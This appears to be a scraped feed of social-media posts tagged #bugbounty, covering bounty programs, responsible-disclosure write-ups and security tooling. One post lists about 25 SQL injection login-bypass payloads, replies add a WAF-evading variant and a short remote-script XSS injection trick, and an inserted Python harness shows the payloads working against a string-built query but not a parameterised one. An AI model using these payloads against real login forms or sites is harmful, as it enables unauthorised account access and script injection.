paheko, We are opening our bug bounty program for #paheko!
This means that if you look for and find security flaws in Paheko, we can reward you. The amount of the reward will depend on the severity of the flaw. We have set aside €1000 for now, an amount that may change depending on the reports we receive.
A partial security audit will also take place in the coming months.
For the details of the bug bounty, see here: https://fossil.kd2.org/paheko/doc/trunk/SECURITY.md
bohwaz, Hello everyone and the #chatons, has anyone already set up a #bugbounty program for an open source project?
Most bug bounty sites seem designed for big companies.
cyber_learning, Do we have, in France and in French, an ethical non-profit platform for disclosing cyber vulnerabilities?
Something like openbugbounty?
If so, which one?
The boost fixes the XSS flaws
ChickenPwny, #bugbounty #tooling =D it takes all the nuclei output and makes it pretty now.
check out my tool https://github.com/PolitoInc/EGOAlpha
jerry, @ChickenPwny very nice!
rwxrwx, @protonmail you paid $750 for a mail-based XSS? this is disappointing for a "service that respects privacy and puts people [...] first". https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/ #bugbounty #protonmail
protonmail, @rwxrwx The issue was fixed in early July 2022. The non-web Proton Mail apps were never affected. At the time the issue was reported, we also conducted a thorough analysis of our available spam and virus filter logs and found no evidence of this attack in the wild except for the proof-of-concept reported to us. This is consistent with the attack's difficulty and the unlikely series of user actions required to make it work.
vito, I had a field that allows html but the length is limited to 40 server side so I couldn't do much. So I registered the domain https://XXX.cc and could load a remote script from <script src=//https://xxx.cc></script> which fits in 30, and got it working nicely. #bugbounty
vito, @CenturyAvocado wow 5 letters. I tried to find one but they all seem gone now :)
CenturyAvocado, @vito "0r.lc" and some other permutations appear to still be available ;)
lirantal, ooh wow, imagemagick is the gift that keeps on giving RCE and command injection 🫣
check out this beauty of a poc
#bugbounty #infosec #cybersecurity
thijs, So somebody has reported an issue through your responsible disclosure program.
If the report is eligible for a reward, what is the preferred way of transferring the money? Is that i.e. PayPal or a different platform?
oggy, FranceConnect #bugbounty for #hackers but not for #cybercriminals
https://yeswehack.com/programs/franceconnect-agentconnect-public
ChickenPwny, #bugbounty leaderboard
sergeant, @ChickenPwny Gay Pride?
insiderphd, If you've seen the updated OWASP API Top 10 you may be a bit confused by the "Authorisation" vulnerabilities - aren't they all just explaining the same thing? Here's a breakdown of the 4 access control issues you commonly see in APIs 👇👇
https://www.craft.me/s/CysIiph247P5AQ
#bugbountytips #BugBounty
_ut0p1c, @insiderphd Thanks for sharing! Last time I checked, I think it was earlier this year, OWASP was last updated in 2021. Is this new info?
0x58, #bugbounty hunters - Get dressed accordingly! 🐛
https://www.etsy.com/listing/1543178070/the-unstoppable-bug-bounty-hunter-t
sanjaymenon, Disposable-mailbox Docker
A self hosted yopmail like server running in a docker
https://github.com/Orange-Cyberdefense/disposable-mailbox-docker
hdm, @sanjaymenon got to love that commit message:
"removed stuff"
sanjaymenon, @hdm 😂
tdp_org, Someone just reported that a link from our Bug Bounty Hall of Fame page goes to an unregistered profile - i.e. link destination takeover.
Beautiful. Well played. The circle is complete.
Cyberkid1987, 🪲 nOAuth | OAuth Implementation Flaw Affecting Azure AD OAuth Applications that could lead to full account takeovers
https://m.youtube.com/watch?v=ceeA3FmKxtM
by @descopeinc
nikahverse, SQL injection auth bypass list
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
revk, @nikahverse last one is cunning…
Rairii, @nikahverse for mysql and derivatives I always liked '||1-- - which tended to bypass a lot of WAFs
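Added example, not part of nikahverse's post or any reply: a small Python/sqlite3 harness that runs a few of the payloads listed above against a string-built login query and against a parameterised one, so the effect of the fix (and why the bracketed variants depend on the original query's shape) is visible. The users table and the placeholder password hashes are constructed for the demo.

```python
import sqlite3

# Constructed sample data; the "hashes" are placeholders, not real credentials.
_SEED = [("admin", "hash_of_admin_pw"), ("alice", "hash_of_alice_pw")]

def _fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", _SEED)
    return db

def login_vulnerable(username, password):
    """String-built query: user input becomes part of the SQL grammar."""
    db = _fresh_db()
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        # The payload broke the query instead of bypassing it (e.g. an
        # unbalanced ')' when the original WHERE clause has no parentheses).
        return None
    return row[0] if row else None

def login_safe(username, password):
    """Parameterised query: input is bound as data and never parsed as SQL."""
    db = _fresh_db()
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# Four entries taken from the list above, used as constructed test input.
PAYLOADS = ["admin' --", "admin' or '1'='1", "admin') or ('1'='1'--", "admin' or 1=1--"]

def bypass_report(payloads=PAYLOADS):
    """Map each payload to (user returned by vulnerable login, user returned by safe login)."""
    return {p: (login_vulnerable(p, "wrong"), login_safe(p, "wrong")) for p in payloads}
```

With the parameterised query every payload is just an unknown username, while the string-built query lets the first two log in as admin and the `or 1=1` form match every row.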
Edent, Found a tasty little #XSS in a new service.
Have performed a #ResponsibleDisclosure - but I doubt they offer a #BugBounty.
SHA1 of the domain: 158281f1ff672afa1159fcb6788aa6825dbb0773
Edent, For those playing along at home, the answer was....
codeberg.page
https://shkspr.mobi/blog/2023/01/responsible-disclosure-xss-in-codeberg-pages/
Edent, Responsible Disclosure: Chrome security bug let tabs draw over each other ($1k bounty)
Chrome for Android had a flaw which let one tab draw over another - even if the tabs were on completely different domains. A determined attacker might have been able to abuse this to convince a user to download and install a
#/etc/ #bug #bugbounty #google #responsibledisclosure #security
Edent, Full Disclosure: XSS in Getty Images
I've spent two months trying to report this issue to Getty images. They haven't responded to my emails, phone calls, Tweets, or LinkedIn messages. I've tried escalating through OpenBugBounty and HackerOne - but still no response. I've taken the decision to fully disclose this XSS because the Getty Images sites accept pa
https://shkspr.mobi/blog/2021/08/full-disclosure-xss-in-getty-images/
Edent, Responsible Disclosure - John Lewis
https://shkspr.mobi/blog/2020/02/responsible-disclosure-john-lewis/
Edent, Even Google forgets to renew its domains
https://shkspr.mobi/blog/2020/01/even-google-forgets-to-renew-its-domains/
sanjaymenon, A compiled list of companies which accept responsible disclosure